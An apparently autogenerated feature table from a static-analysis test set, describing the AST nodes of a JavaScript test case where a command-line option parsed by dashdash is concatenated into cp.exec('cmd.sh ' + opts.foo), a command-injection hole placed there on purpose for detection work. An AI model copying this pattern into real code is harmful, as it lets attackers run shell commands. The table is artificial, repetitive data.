autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:8 | cp.exec | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:30 | cp.exec ... ts.foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:30 | cp.exec ... ts.foo) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:30 | cp.exec ... ts.foo) | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:30 | cp.exec ... ts.foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:30 | cp.exec ... ts.foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:30 | exceptional return of cp.exec ... ts.foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:30 | exceptional return of cp.exec ... ts.foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:30 | exceptional return of cp.exec ... ts.foo) | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:30 | exceptional return of cp.exec ... ts.foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:30 | exceptional return of cp.exec ... ts.foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:5:124:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:5:124:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:5:124:8 | exec | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:5:124:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:5:124:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:10:124:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:10:124:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:10:124:18 | "cmd.sh " | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:10:124:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:10:124:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:10:124:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- opts.foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:22:124:25 | opts | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:22:124:25 | opts | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:22:124:25 | opts | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:22:124:25 | opts | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:22:124:25 | opts | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:22:124:29 | opts.foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:22:124:29 | opts.foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:22:124:29 | opts.foo | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:22:124:29 | opts.foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:22:124:29 | opts.foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:22:124:29 | opts.foo | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:27:124:29 | foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:27:124:29 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:27:124:29 | foo | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:27:124:29 | foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:27:124:29 | foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:6:126:11 | parser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:6:126:11 | parser | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:6:126:11 | parser | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:6:126:11 | parser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:6:126:11 | parser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:6:126:55 | parser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:6:126:55 | parser | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:6:126:55 | parser | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:6:126:55 | parser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:6:126:55 | parser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:6:126:55 | parser ... tions}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:6:126:55 | parser ... tions}) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:6:126:55 | parser ... tions}) | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:6:126:55 | parser ... tions}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:6:126:55 | parser ... tions}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:22 | dashdash | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:22 | dashdash | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:22 | dashdash | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:22 | dashdash | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:22 | dashdash | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:35 | dashdas ... eParser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:35 | dashdas ... eParser | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:35 | dashdas ... eParser | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:35 | dashdas ... eParser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:35 | dashdas ... eParser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:55 | dashdas ... tions}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:55 | dashdas ... tions}) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:55 | dashdas ... tions}) | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:55 | dashdas ... tions}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:55 | dashdas ... tions}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:55 | exceptional return of dashdas ... tions}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:55 | exceptional return of dashdas ... tions}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:55 | exceptional return of dashdas ... tions}) | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:55 | exceptional return of dashdas ... tions}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:55 | exceptional return of dashdas ... tions}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:24:126:35 | createParser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:24:126:35 | createParser | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:24:126:35 | createParser | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:24:126:35 | createParser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:24:126:35 | createParser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:37:126:54 | {options: options} | CalleeFlexibleAccessPath | dashdash.createParser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:37:126:54 | {options: options} | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:37:126:54 | {options: options} | calleeImports | dashdash | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:37:126:54 | {options: options} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:37:126:54 | {options: options} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:37:126:54 | {options: options} | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:37:126:54 | {options: options} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:37:126:54 | {options: options} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:37:126:54 | {options: options} | receiverName | dashdash | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:38:126:44 | options | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:38:126:44 | options | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:38:126:44 | options | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:38:126:44 | options | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:38:126:44 | options | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:38:126:53 | options: options | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:38:126:53 | options: options | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:38:126:53 | options: options | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:38:126:53 | options: options | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:38:126:53 | options: options | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:38:126:53 | options: options | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:38:126:53 | options: options | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:38:126:53 | options: options | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:38:126:53 | options: options | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:38:126:53 | options: options | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:47:126:53 | options | CalleeFlexibleAccessPath | dashdash.createParser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:47:126:53 | options | InputAccessPathFromCallee | 0.options | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:47:126:53 | options | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:47:126:53 | options | assignedToPropName | options | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:47:126:53 | options | calleeImports | dashdash | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:47:126:53 | options | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:47:126:53 | options | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:47:126:53 | options | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:47:126:53 | options | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:47:126:53 | options | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:6:127:9 | opts | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:6:127:9 | opts | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:6:127:9 | opts | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:6:127:9 | opts | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:6:127:9 | opts | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:6:127:26 | opts | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:6:127:26 | opts | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:6:127:26 | opts | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:6:127:26 | opts | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:6:127:26 | opts | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:6:127:26 | opts = ... parse() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:6:127:26 | opts = ... parse() | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:6:127:26 | opts = ... parse() | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:6:127:26 | opts = ... parse() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:6:127:26 | opts = ... parse() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:18 | parser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:18 | parser | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:18 | parser | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:18 | parser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:18 | parser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:24 | parser.parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:24 | parser.parse | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:24 | parser.parse | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:24 | parser.parse | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:24 | parser.parse | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:26 | exceptional return of parser.parse() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:26 | exceptional return of parser.parse() | contextSurroundingFunctionParameters | | +| 